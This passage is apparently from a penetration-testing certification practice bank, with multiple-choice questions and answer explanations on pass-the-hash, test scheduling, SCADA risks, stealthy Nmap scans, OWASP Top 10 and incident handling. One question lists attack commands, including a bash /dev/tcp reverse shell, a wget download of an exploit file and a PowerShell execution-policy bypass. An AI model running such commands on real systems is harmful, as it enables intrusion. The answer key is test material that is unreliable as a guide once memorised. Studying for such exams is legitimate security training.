D. Utilize a pass-the-hash attack. A pass-the-hash attack is a method of authenticating to a server or service by using the underlying NTLM or LANMAN hash of a user's password, instead of the actual password. Replaying the captured traffic to the server to recreate the session may not work as the session may have timed out or otherwise been terminated.

When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because: A. security compliance regulations or laws may be violated. B. testing can make detecting actual APT more challenging. C. testing adds to the workload of defensive cyber- and threat-hunting teams. D. business and network operations may be impacted.

D. business and network operations may be impacted.

Performing a penetration test against an environment with SCADA devices brings an additional safety risk because the: A. devices produce more heat and consume more power. B. devices are obsolete and are no longer available for replacement. C. protocols are more difficult to understand. D. devices may cause physical world effects.

D. devices may cause physical world effects.

A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible.Which of the following Nmap scan syntaxes would BEST accomplish this objective? A. nmap -sT -vvv -O 192.168.1.2/24 -PO B. nmap -sV 192.168.1.2/24 -PO C. nmap -sA -v -O 192.168.1.2/24 D. nmap -sS -O 192.168.1.2/24 -T1

D. nmap -sS -O 192.168.1.2/24 -T1 The -sS option uses the SYN packet to initiate a connection, which is less likely to be detected by intrusion detection systems (IDS) and firewalls as it does not complete the full TCP connection. The -O option enables OS detection, which can help identify the type of device that is being scanned and can be useful in identifying vulnerabilities specific to that OS. The -T1 option sets the timing option to the slowest setting, this will make the scan slower, but also less likely to trigger alarms and countermeasures.

A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891 Which of the following commands could be used to download a file named exploit to a target machine for execution? A. nc 10.10.51.50 9891 < exploit B. powershell -exec bypass -f \\10.10.51.50\9891 C. bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit D. wget 10.10.51.50:9891/exploit

D. wget 10.10.51.50:9891/exploit This command uses the wget utility to download files from the web via HTTP, HTTPS and FTP. In this case, it's connecting to the IP address 10.10.51.50 and port 9891, where the exploit file is hosted and download the file

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified.Which of the following character combinations should be used on the first line of the script to accomplish this goal? A. <# B. <$ C. ## D. #$ E. #!

E. #!

Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.) A. Buffer overflows B. Cross-site scripting C. Race-condition attacks D. Zero-day attacks E. Injection flaws F. Ransomware attacks

E. Injection flaws B. Cross-site scripting

Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware? A. Analyze the malware to see what it does. B. Collect the proper evidence and then remove the malware. C. Do a root-cause analysis to find out how the malware got in. D. Remove the malware immediately. E. Stop the assessment and inform the emergency contact.

E. Stop the assessment and inform the emergency contact.